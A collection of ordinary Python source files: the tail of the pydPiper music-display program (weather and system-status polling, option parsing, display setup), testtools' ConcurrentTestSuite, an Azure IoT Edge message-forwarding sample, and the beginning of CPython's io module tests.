logging.warning('Unauthorized. API authorization failed. API key is [{0}]'.format(pydPiper_config.WEATHER_API))
elif status_code == 403:
logging.warning('Unauthorized. You do not have permission to access this endpoint')
elif status_code == 404:
logging.warning('Server has not found a route matching the given URI. Request was [{0}]'.format(querystr))
elif status_code == 500:
logging.warning('Server encountered an unexpected condition which prevented it from fulfilling the request. Request was [{0}]'.format(querystr))
elif status_code == 200:
return True
else:
logging.warning('An unexpected return value was provide. Value was [{0}]. Request was [{1}]'.format(status_code,querystr))
return False
def updateforecast(self):
if not self.checkweatherconfiguration():
return
logging.debug('Initializing weather forecast update process. Forecasts will update every 12 hours at noon and midnight')
while not exitapp[0]:
updateFlag = False
logging.debug('Requesting weather forecast from {0}'.format(pydPiper_config.WEATHER_SERVICE))
if pydPiper_config.WEATHER_SERVICE == 'accuweather':
querystr = 'http://dataservice.accuweather.com/forecasts/v1/daily/1day/' + pydPiper_config.WEATHER_LOCATION
r = requests.get(querystr, { 'apikey': pydPiper_config.WEATHER_API, })
if self.checkaccuweatherreturn(r.status_code):
try:
res = r.json()
todaysForecast = res['DailyForecasts'][0]
temp_max_f = todaysForecast['Temperature']['Maximum']['Value'] if todaysForecast['Temperature']['Maximum']['Unit'] == 'F' else round((todaysForecast['Temperature']['Maximum']['Value']*1.8)+32,1)
temp_min_f = todaysForecast['Temperature']['Minimum']['Value'] if todaysForecast['Temperature']['Minimum']['Unit'] == 'F' else round((todaysForecast['Temperature']['Minimum']['Value']*1.8)+32,1)
outside_temp_max = temp_max_f if pydPiper_config.TEMPERATURE.lower() == 'fahrenheit' else round((temp_max_f-32)*0.55555556,1)
outside_temp_min = temp_min_f if pydPiper_config.TEMPERATURE.lower() == 'fahrenheit' else round((temp_min_f-32)*0.55555556,1)
outside_temp_max_formatted = u"{0}°{1}".format(int(outside_temp_max),{'fahrenheit':'F', 'celsius': 'C'}.get(pydPiper_config.TEMPERATURE.lower()))
outside_temp_min_formatted = u"{0}°{1}".format(int(outside_temp_min),{'fahrenheit':'F', 'celsius': 'C'}.get(pydPiper_config.TEMPERATURE.lower()))
outside_conditions = todaysForecast['Day']['IconPhrase']
updateFlag = True
except (KeyError, IndexError, ValueError):
logging.warning('AccuWeather provided a response in an unexpected format. Received [{0}]'.format(res))
if updateFlag:
logging.debug('Forecast calls for a high of {0}, a low of {1}. Condition is {2}'.format(outside_temp_max_formatted, outside_temp_min_formatted, outside_conditions))
with self.musicdata_lock:
self.musicdata[u'outside_temp_max'] = outside_temp_max
self.musicdata[u'outside_temp_min'] = outside_temp_min
self.musicdata[u'outside_temp_max_formatted'] = outside_temp_max_formatted
self.musicdata[u'outside_temp_min_formatted'] = outside_temp_min_formatted
self.musicdata[u'outside_conditions'] = outside_conditions
# Sleep until next update which occurs every half day
pause.sleepUntil(time.time()+pause.nextHalfday(60), exitapp)
def updateconditions(self):
if not self.checkweatherconfiguration():
return
logging.debug('Initializing weather current conditions update process. Current conditions will update every hour')
while not exitapp[0]:
updateFlag = False
# If using accuweather, sample current condition date every hour
if pydPiper_config.WEATHER_SERVICE == 'accuweather':
logging.debug('Requesting current conditions from {0}'.format(pydPiper_config.WEATHER_SERVICE))
querystr = 'http://dataservice.accuweather.com/currentconditions/v1/' + pydPiper_config.WEATHER_LOCATION
r = requests.get(querystr, { 'apikey': pydPiper_config.WEATHER_API })
if self.checkaccuweatherreturn(r.status_code):
try:
res = r.json()
current_observation = res[0]
temp = current_observation['Temperature']['Imperial']['Value'] if pydPiper_config.TEMPERATURE.lower() == 'fahrenheit' else current_observation['Temperature']['Metric']['Value']
temp_formatted = u"{0}°{1}".format(int(temp),{'fahrenheit':'F', 'celsius': 'C'}.get(pydPiper_config.TEMPERATURE.lower()))
updateFlag = True
except (KeyError, IndexError, ValueError):
logging.warning('AccuWeather provided a response in an unexpected format. Received [{0}]'.format(res))
if updateFlag:
logging.debug('Current Temperature is {0}'.format(temp_formatted))
with self.musicdata_lock:
self.musicdata[u'outside_temp'] = temp
self.musicdata[u'outside_temp_formatted'] = temp_formatted
# If using Weather Undergroun, sample current and forecast condition date every hour
elif pydPiper_config.WEATHER_SERVICE == 'wunderground':
querystr = 'http://api.wunderground.com/api/' + pydPiper_config.WEATHER_API + '/geolookup/conditions/forecast/q/' + pydPiper_config.WEATHER_LOCATION + '.json'
r = requests.get(querystr)
if self.checkaccuweatherreturn(r.status_code):
try:
res = r.json()
if 'error' in res['response']:
logging.warning('Error occured retrieving forecast from Weather Underground. Problem type was [{0}]:[{1}]'.format(res['response']['error']['type'],res['response']['error']['description']))
else:
todaysForecast = res['forecast']['simpleforecast']['forecastday'][0]
currentObservation = res['current_observation']
temp = currentObservation['temp_f'] if pydPiper_config.TEMPERATURE.lower() == 'fahrenheit' else currentObservation['temp_c']
temp_formatted = u"{0}°{1}".format(int(temp),{'fahrenheit':'F', 'celsius': 'C'}.get(pydPiper_config.TEMPERATURE.lower()))
temp_max_f = round(float(todaysForecast['high']['fahrenheit']),1)
temp_min_f = round(float(todaysForecast['low']['fahrenheit']),1)
temp_max_c = round(float(todaysForecast['high']['celsius']),1)
temp_min_c = round(float(todaysForecast['low']['celsius']),1)
outside_temp_max = temp_max_f if pydPiper_config.TEMPERATURE.lower() == 'fahrenheit' else temp_max_c
outside_temp_min = temp_min_f if pydPiper_config.TEMPERATURE.lower() == 'fahrenheit' else temp_min_c
outside_temp_max_formatted = u"{0}°{1}".format(int(outside_temp_max),{'fahrenheit':'F', 'celsius': 'C'}.get(pydPiper_config.TEMPERATURE.lower()))
outside_temp_min_formatted = u"{0}°{1}".format(int(outside_temp_min),{'fahrenheit':'F', 'celsius': 'C'}.get(pydPiper_config.TEMPERATURE.lower()))
outside_conditions = currentObservation['weather']
updateFlag = True
except (KeyError, IndexError, ValueError):
logging.warning('Weather Underground provided a response in an unexpected format. Received [{0}]'.format(res))
if updateFlag:
logging.debug('Current Temperature is {0}'.format(temp_formatted))
with self.musicdata_lock:
self.musicdata[u'outside_temp'] = temp
self.musicdata[u'outside_temp_formatted'] = temp_formatted
self.musicdata[u'outside_temp_max'] = outside_temp_max
self.musicdata[u'outside_temp_min'] = outside_temp_min
self.musicdata[u'outside_temp_max_formatted'] = outside_temp_max_formatted
self.musicdata[u'outside_temp_min_formatted'] = outside_temp_min_formatted
self.musicdata[u'outside_conditions'] = outside_conditions
# Sleep until next update which occurs every hour
pause.sleepUntil(time.time()+pause.nextHour(60), exitapp)
def updatesystemvars(self):
logging.debug('Initializing current system status update process. System status will update every five minutes')
while not exitapp[0]:
current_ip = commands.getoutput(u"ip -4 route get 1 | head -1 | cut -d' ' -f8 | tr -d '\n'").strip()
try:
with open(u"/sys/class/thermal/thermal_zone0/temp") as file:
system_tempc = int(file.read())
# Convert value to float and correct decimal place
system_tempc = round(float(system_tempc) / 1000,1)
# convert to fahrenheit
system_tempf = round(system_tempc*9/5+32,1)
except AttributeError:
system_tempc = 0.0
system_tempf = 0.0
try:
if pydPiper_config.TEMPERATURE.lower() == u'celsius':
system_temp = system_tempc
system_temp_formatted = u"{0}°c".format(int(system_temp))
else:
system_temp = system_tempf
system_temp_formatted = u"{0}°f".format(int(system_temp))
except:
system_temp = system_tempf
system_temp_formatted = u"{0}°f".format(int(system_temp))
try:
# Check if running on OSX. If yes, adjust df command
if sys.platform == u"darwin":
with os.popen(u"df /") as p:
p = os.popen(u"df /")
line = p.readline()
line = p.readline()
va = line.split()
line = "{0} {1}".format(va[3], va[4])
else:
# assume running on Raspberry linux
with os.popen(u"df -B 1 /") as p:
line = p.readline()
line = p.readline().strip()
va = line.split()
avail = int(va[3])
usedp = int(va[4][:-1]) # Remove trailing % and convert to int
used = int(va[2])
availp = 100-usedp
except AttributeError:
avail = 0
availp = 0
usedp = 0
used = 0
logging.debug('System status: Temp {0}, Disk space remaining {1}%, IP address {2}'.format(system_temp_formatted, availp, current_ip.decode()))
with self.musicdata_lock:
self.musicdata[u'system_temp'] = system_temp
self.musicdata[u'system_temp_formatted'] = system_temp_formatted
self.musicdata[u'system_tempc'] = system_tempc
self.musicdata[u'system_tempf'] = system_tempf
# For backward compatibility
self.musicdata[u'current_tempc'] = self.musicdata[u'system_tempc']
self.musicdata[u'current_tempf'] = self.musicdata[u'system_tempf']
self.musicdata[u'disk_avail'] = avail
self.musicdata[u'disk_availp'] = availp
self.musicdata[u'disk_used'] = used
self.musicdata[u'disk_usedp'] = usedp
self.musicdata[u'ip'] = current_ip.decode()
# For backwards compatibility
self.musicdata[u'current_ip'] = current_ip.decode()
# Sleep until next update which occurs every minutes
pause.sleepUntil(time.time()+300, exitapp)
def sigterm_handler(_signo, _stack_frame):
sys.exit(0)
if __name__ == u'__main__':
import math
signal.signal(signal.SIGTERM, sigterm_handler)
# Changing the system encoding should no longer be needed
# if sys.stdout.encoding != u'UTF-8':
# sys.stdout = codecs.getwriter(u'utf-8')(sys.stdout, u'strict')
logging.basicConfig(format=u'%(asctime)s:%(levelname)s:%(message)s', filename=pydPiper_config.LOGFILE, level=pydPiper_config.LOGLEVEL)
logging.getLogger().addHandler(logging.StreamHandler())
logging.getLogger(u'socketIO-client').setLevel(logging.WARNING)
# Move unhandled exception messages to log file
def handleuncaughtexceptions(exc_type, exc_value, exc_traceback):
if issubclass(exc_type, KeyboardInterrupt):
sys.__excepthook__(exc_type, exc_value, exc_traceback)
return
logging.error(u"Uncaught exception", exc_info=(exc_type, exc_value, exc_traceback))
try:
if len(mc.musicdata) > 0:
logging.error(u"Player status at exception")
logging.error(unicode(mc.musicdata))
except NameError:
# If this gets called before the music controller is instantiated, ignore it
pass
sys.__excepthook__(exc_type, exc_value, exc_traceback)
sys.excepthook = handleuncaughtexceptions
# Suppress MPD libraries INFO messages
loggingMPD = logging.getLogger(u"mpd")
loggingMPD.setLevel( logging.WARN )
loggingPIL = logging.getLogger(u'PIL')
loggingPIL.setLevel( logging.WARN )
try:
opts, args = getopt.getopt(sys.argv[1:],u"d:",[u"driver=",u"devicetype=",u"width=",u"height=","rs=","e=","d4=","d5=","d6=","d7=","i2caddress=","i2cport=" ,u"wapi=", u"wlocale=", u"timezone=", u"temperature=", u"lms",u"mpd",u"spop",u"rune",u"volumio",u"pages=", u"lmsplayer=", u"showupdates"])
except getopt.GetoptError:
print u'pydPiper.py -d <driver> --devicetype <devicetype (for LUMA devices)> --width <width in pixels> --height <height in pixels> --rs <rs> --e <e> --d4 <d4> --d5 <d5> --d6 <d6> --d7 <d7> --i2caddress <i2c address> --i2cport <i2c port> --wapi <weather underground api key> --wlocale <weather location> --timezone <timezone> --temperature <fahrenheit or celsius> --mpd --spop --lms --rune --volumio --pages <pagefile> --lmsplayer <mac address of lms player> --showupdates'
sys.exit(2)
services_list = [ ]
driver = ''
devicetype = ''
showupdates = False
pagefile = 'pages.py'
pin_rs = pydPiper_config.DISPLAY_PIN_RS
pin_e = pydPiper_config.DISPLAY_PIN_E
[pin_d4, pin_d5, pin_d6, pin_d7] = pydPiper_config.DISPLAY_PINS_DATA
rows = pydPiper_config.DISPLAY_HEIGHT
cols = pydPiper_config.DISPLAY_WIDTH
i2c_address = pydPiper_config.DISPLAY_I2C_ADDRESS
i2c_port = pydPiper_config.DISPLAY_I2C_PORT
enable = pydPiper_config.DISPLAY_ENABLE_DURATION
driver = pydPiper_config.DISPLAY_DRIVER
pagefile = pydPiper_config.PAGEFILE
services_list.append(pydPiper_config.MUSIC_SERVICE)
for opt, arg in opts:
if opt == u'-h':
print u'pydPiper.py -d <driver> --devicetype <devicetype e.g. ssd1306, sh1106> --width <width in pixels> --height <height in pixels> --rs <rs> --e <e> --d4 <d4> --d5 <d5> --d6 <d6> --d7 <d7> --i2caddress <i2c address> --i2cport <i2c port> --enable <enable duration> --wapi <weather underground api key> --wlocale <weather location> --timezone <timezone> --temperature <fahrenheit or celsius> --mpd --spop --lms --rune --volumio --pages <pagefile> --lmsplayer <mac address of lms player> --showupdates'
sys.exit()
elif opt in (u"-d", u"--driver"):
driver = arg
elif opt in (u"--devicetype"):
devicetype = arg
elif opt in ("--rs"):
pin_rs = int(arg)
elif opt in ("--e"):
pin_e = int(arg)
elif opt in ("--d4"):
pin_d4 = int(arg)
elif opt in ("--d5"):
pin_d5 = int(arg)
elif opt in ("--d6"):
pin_d6 = int(arg)
elif opt in ("--d7"):
pin_d7 = int(arg)
elif opt in ("--i2caddress"):
i2c_address = int(arg,0)
elif opt in ("--i2cport"):
i2c_port = int(arg,0)
elif opt in ("--width"):
cols = int(arg,0)
elif opt in ("--height"):
rows = int(arg,0)
elif opt in ("--enable"):
enable = int(arg)
elif opt in (u"--wapi"):
pydPiper_config.WUNDER_API = arg
elif opt in (u"--wlocale"):
pydPiper_config.WUNDER_LOCATION = arg
elif opt in (u"--timezone"):
pydPiper_config.TIMEZONE = arg
elif opt in (u"--temperature"):
pydPiper_config.TEMPERATURE = arg
elif opt in (u"--mpd"):
services_list.append(u'mpd')
elif opt in (u"--spop"):
services_list.append(u'spop')
elif opt in (u"--lms"):
services_list.append(u'lms')
elif opt in (u"--lmsplayer"):
pydPiper_config.LMS_PLAYER = arg
elif opt in (u"--rune"):
services_list.append(u'rune')
elif opt in (u"--volumio"):
services_list.append(u'volumio')
elif opt in (u"--pages"):
pagefile = arg
# print u"Loading {0} as page file".format(arg)
# If page file provided, try to load provided file on top of default pages file
# try:
# newpages = imp.load_source(u'pages', arg)
# if validpages(newpages):
# pages = newpages
# else:
# print u"Invalid page file provided. Using default pages."
# except IOError:
# # Page file not found
# print u"Page file {0} not found. Using default pages".format(arg)
elif opt in (u"--showupdates"):
showupdates = True
pydPiper_config.DISPLAY_SIZE = (cols, rows)
pins_data = [pin_d4, pin_d5, pin_d6, pin_d7]
if len(services_list) == 0:
logging.critical(u"Must have at least one music service to monitor")
sys.exit()
logging.info(u'pydPiper starting')
dq = Queue.Queue()
# Choose display
if not driver:
try:
driver = pydPiper_config.DISPLAY_DRIVER
except:
drvier = u''
if not devicetype:
try:
devicetype = pydPiper_config.DISPLAY_DEVICETYPE
except:
devicetype = u''
if driver == u"winstar_weg":
lcd = displays.winstar_weg.winstar_weg(rows, cols, pin_rs, pin_e, pins_data, enable)
elif driver == u"hd44780":
lcd = displays.hd44780.hd44780(rows, cols, pin_rs, pin_e, pins_data, enable)
elif driver == u"hd44780_i2c":
lcd = displays.hd44780_i2c.hd44780_i2c(rows, cols, i2c_address, i2c_port, enable)
elif driver == u"ssd1306_i2c":
lcd = displays.ssd1306_i2c.ssd1306_i2c(rows, cols, i2c_address, i2c_port)
elif driver == u"luma_i2c":
lcd = displays.luma_i2c.luma_i2c(rows, cols, i2c_address, i2c_port, devicetype)
elif driver == u"curses":
lcd = displays.curses.curses(rows, cols)
else:
logging.critical(u"No valid display found")
sys.exit()
lcd.clear()
logging.debug('Loading display controller')
dc = displays.display.display_controller(pydPiper_config.DISPLAY_SIZE)
logging.debug('Loading music controller')
mc = music_controller(services_list, dc, showupdates)
time.sleep(2)
mc.start()
dc.load(pagefile, mc.musicdata,mc.musicdata_prev )
try:
while True:
# Get next image and send it to the display every .1 seconds
with mc.musicdata_lock:
img = dc.next()
# displays.graphics.update(img)
lcd.update(img)
time.sleep(pydPiper_config.ANIMATION_SMOOTHING)
except KeyboardInterrupt:
pass
finally:
print u"Shutting down threads"
exitapp[0] = True
try:
lcd.clear()
lcd.message(u"Exiting...")
time.sleep(3)
lcd.clear()
lcd.cleanup()
except:
pass
mc.join()
logging.info(u"Exiting...")
|
testsuite.py
|
# Copyright (c) 2009 Jonathan M. Lange. See LICENSE for details.
"""Test suites and related things."""
__metaclass__ = type
__all__ = [
'ConcurrentTestSuite',
'iterate_tests',
]
try:
from Queue import Queue
except ImportError:
from queue import Queue
import threading
import unittest
import testtools
def iterate_tests(test_suite_or_case):
"""Iterate through all of the test cases in 'test_suite_or_case'."""
try:
suite = iter(test_suite_or_case)
except TypeError:
yield test_suite_or_case
else:
for test in suite:
for subtest in iterate_tests(test):
yield subtest
class ConcurrentTestSuite(unittest.TestSuite):
"""A TestSuite whose run() calls out to a concurrency strategy."""
def __init__(self, suite, make_tests):
"""Create a ConcurrentTestSuite to execute suite.
:param suite: A suite to run concurrently.
:param make_tests: A helper function to split the tests in the
ConcurrentTestSuite into some number of concurrently executing
sub-suites. make_tests must take a suite, and return an iterable
of TestCase-like object, each of which must have a run(result)
method.
"""
super(ConcurrentTestSuite, self).__init__([suite])
self.make_tests = make_tests
def run(self, result):
"""Run the tests concurrently.
This calls out to the provided make_tests helper, and then serialises
the results so that result only sees activity from one TestCase at
a time.
ConcurrentTestSuite provides no special mechanism to stop the tests
returned by make_tests, it is up to the make_tests to honour the
shouldStop attribute on the result object they are run with, which will
be set if an exception is raised in the thread which
ConcurrentTestSuite.run is called in.
"""
tests = self.make_tests(self)
try:
threads = {}
queue = Queue()
result_semaphore = threading.Semaphore(1)
for test in tests:
process_result = testtools.ThreadsafeForwardingResult(result,
result_semaphore)
reader_thread = threading.Thread(
target=self._run_test, args=(test, process_result, queue))
threads[test] = reader_thread, process_result
reader_thread.start()
while threads:
finished_test = queue.get()
threads[finished_test][0].join()
del threads[finished_test]
except:
for thread, process_result in threads.values():
process_result.stop()
raise
def _run_test(self, test, process_result, queue):
try:
test.run(process_result)
finally:
queue.put(test)
|
main.py
|
# Copyright (c) Microsoft. All rights reserved.
# Licensed under the MIT license. See LICENSE file in the project root for
# full license information.
# For guidance, see https://docs.microsoft.com/azure/iot-edge/tutorial-python-module
import sys
import time
import threading
from azure.iot.device import IoTHubModuleClient, Message
# global counters
RECEIVED_MESSAGES = 0
def receive_message_listener(client):
# This listener function only triggers for messages sent to "input1".
# Messages sent to other inputs or to the default will be silently discarded.
global RECEIVED_MESSAGES
while True:
message = client.receive_message_on_input("input1") # blocking call
RECEIVED_MESSAGES += 1
print("Message received on input1")
print( " Data: <<{}>>".format(message.data) )
print( " Properties: {}".format(message.custom_properties))
print( " Total calls received: {}".format(RECEIVED_MESSAGES))
print("Forwarding message to output1")
client.send_message_to_output(message, "output1")
print("Message successfully forwarded")
def main():
try:
print ( "\nPython {}\n".format(sys.version) )
print ( "IoT Hub Client for Python" )
client = IoTHubModuleClient.create_from_edge_environment()
# Begin listening for messages
message_listener_thread = threading.Thread(target=receive_message_listener, args=(client,))
message_listener_thread.daemon = True
message_listener_thread.start()
print ( "Starting the IoT Hub Python sample...")
print ( "The sample is now waiting for messages and will indefinitely. Press Ctrl-C to exit. ")
while True:
time.sleep(1000)
except KeyboardInterrupt:
print ( "IoTHubClient sample stopped" )
except:
print ( "Unexpected error from IoTHub" )
return
if __name__ == '__main__':
try:
main()
except Exception as error:
print ( error )
sys.exit(1)
|
test_io.py
|
"""Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as an attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
import abc
import array
import errno
import locale
import os
import pickle
import random
import signal
import sys
import time
import unittest
import warnings
import weakref
from collections import deque, UserList
from itertools import cycle, count
from test import support
from test.support.script_helper import assert_python_ok, run_python_until_end
import codecs
import io # C implementation of io
import _pyio as pyio # Python implementation of io
try:
import threading
except ImportError:
threading = None
try:
import ctypes
except ImportError:
def byteslike(*pos, **kw):
return array.array("b", bytes(*pos, **kw))
else:
def byteslike(*pos, **kw):
"""Create a bytes-like object having no string or sequence methods"""
data = bytes(*pos, **kw)
obj = EmptyStruct()
ctypes.resize(obj, len(data))
memoryview(obj).cast("B")[:] = data
return obj
class EmptyStruct(ctypes.Structure):
pass
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with open(__file__, "r", encoding="latin-1") as f:
return f._CHUNK_SIZE
class MockRawIOWithoutRead:
"""A RawIO implementation without read(), so as to exercise the default
RawIO.read() which calls readinto()."""
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
self._extraneous_reads = 0
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0 # wrong but we gotta return something
def tell(self):
return 0 # same comment as above
def readinto(self, buf):
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
self._extraneous_reads += 1
return 0
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
pass
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
pass
class MockRawIO(MockRawIOWithoutRead):
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
self._extraneous_reads += 1
return b""
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return super().write(b) * 2
def read(self, n=None):
return super().read(n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
super().readinto(buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
raise OSError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super().__init__(data)
def read(self, n=None):
res = super().read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super().readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
class MockUnseekableIO:
def seekable(self):
return False
def seek(self, *args):
raise self.UnsupportedOperation("not seekable")
def tell(self, *args):
raise self.UnsupportedOperation("not seekable")
def truncate(self, *args):
raise self.UnsupportedOperation("not seekable")
class CMockUnseekableIO(MockUnseekableIO, io.BytesIO):
UnsupportedOperation = io.UnsupportedOperation
class PyMockUnseekableIO(MockUnseekableIO, pyio.BytesIO):
UnsupportedOperation = pyio.UnsupportedOperation
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b"".join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
return True
def writable(self):
return True
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
if n > 0:
# write data up to the first blocker
self._write_stack.append(b[:n])
return n
else:
# cancel blocker and indicate would block
self._blocker_char = None
return None
self._write_stack.append(b)
return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
def setUp(self):
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b"blah."), 5)
f.truncate(0)
self.assertEqual(f.tell(), 5)
f.seek(0)
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
buffer = bytearray(b" world\n\n\n")
self.assertEqual(f.write(buffer), 9)
buffer[:] = b"*" * 9 # Overwrite our copy of the data
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 13)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = byteslike(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(bytes(data), b" worl")
data = bytearray(5)
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(byteslike(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(byteslike()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
f.seek(0)
data = byteslike(5)
self.assertEqual(f.readinto1(data), 5)
self.assertEqual(bytes(data), b"hello")
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
try:
self.assertEqual(f.seek(self.LARGE), self.LARGE)
except (OverflowError, ValueError):
self.skipTest("no largefile support")
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_invalid_operations(self):
# Try writing on a file opened in read mode and vice-versa.
exc = self.UnsupportedOperation
for mode in ("w", "wb"):
with self.open(support.TESTFN, mode) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "wb", buffering=0) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "rb", buffering=0) as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "rb") as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "r") as fp:
self.assertRaises(exc, fp.write, "blah")
self.assertRaises(exc, fp.writelines, ["blah\n"])
# Non-zero seeking from current or end pos
self.assertRaises(exc, fp.seek, 1, self.SEEK_CUR)
self.assertRaises(exc, fp.seek, -1, self.SEEK_END)
def test_optional_abilities(self):
# Test for OSError when optional APIs are not supported
# The purpose of this test is to try fileno(), reading, writing and
# seeking operations with various objects that indicate they do not
# support these operations.
def pipe_reader():
[r, w] = os.pipe()
os.close(w) # So that read() is harmless
return self.FileIO(r, "r")
def pipe_writer():
[r, w] = os.pipe()
self.addCleanup(os.close, r)
# Guarantee that we can write into the pipe without blocking
thread = threading.Thread(target=os.read, args=(r, 100))
thread.start()
self.addCleanup(thread.join)
return self.FileIO(w, "w")
def buffered_reader():
return self.BufferedReader(self.MockUnseekableIO())
def buffered_writer():
return self.BufferedWriter(self.MockUnseekableIO())
def buffered_random():
return self.BufferedRandom(self.BytesIO())
def buffered_rw_pair():
return self.BufferedRWPair(self.MockUnseekableIO(),
self.MockUnseekableIO())
def text_reader():
class UnseekableReader(self.MockUnseekableIO):
writable = self.BufferedIOBase.writable
write = self.BufferedIOBase.write
return self.TextIOWrapper(UnseekableReader(), "ascii")
def text_writer():
class UnseekableWriter(self.MockUnseekableIO):
readable = self.BufferedIOBase.readable
read = self.BufferedIOBase.read
return self.TextIOWrapper(UnseekableWriter(), "ascii")
tests = (
(pipe_reader, "fr"), (pipe_writer, "fw"),
(buffered_reader, "r"), (buffered_writer, "w"),
(buffered_random, "rws"), (buffered_rw_pair, "rw"),
(text_reader, "r"), (text_writer, "w"),
(self.BytesIO, "rws"), (self.StringIO, "rws"),
)
for [test, abilities] in tests:
if test is pipe_writer and not threading:
continue # Skip subtest that uses a background thread
with self.subTest(test), test() as obj:
readable = "r" in abilities
self.assertEqual(obj.readable(), readable)
writable = "w" in abilities
self.assertEqual(obj.writable(), writable)
if isinstance(obj, self.TextIOBase):
data = "3"
elif isinstance(obj, (self.BufferedIOBase, self.RawIOBase)):
data = b"3"
else:
self.fail("Unknown base class")
if "f" in abilities:
obj.fileno()
else:
self.assertRaises(OSError, obj.fileno)
if readable:
obj.read(1)
obj.read()
else:
self.assertRaises(OSError, obj.read, 1)
self.assertRaises(OSError, obj.read)
if writable:
obj.write(data)
else:
self.assertRaises(OSError, obj.write, data)
if sys.platform.startswith("win") and test in (
pipe_reader, pipe_writer):
# Pipes seem to appear as seekable on Windows
continue
seekable = "s" in abilities
self.assertEqual(obj.seekable(), seekable)
if seekable:
obj.tell()
obj.seek(0)
else:
self.assertRaises(OSError, obj.tell)
self.assertRaises(OSError, obj.seek, 0)
if writable and seekable:
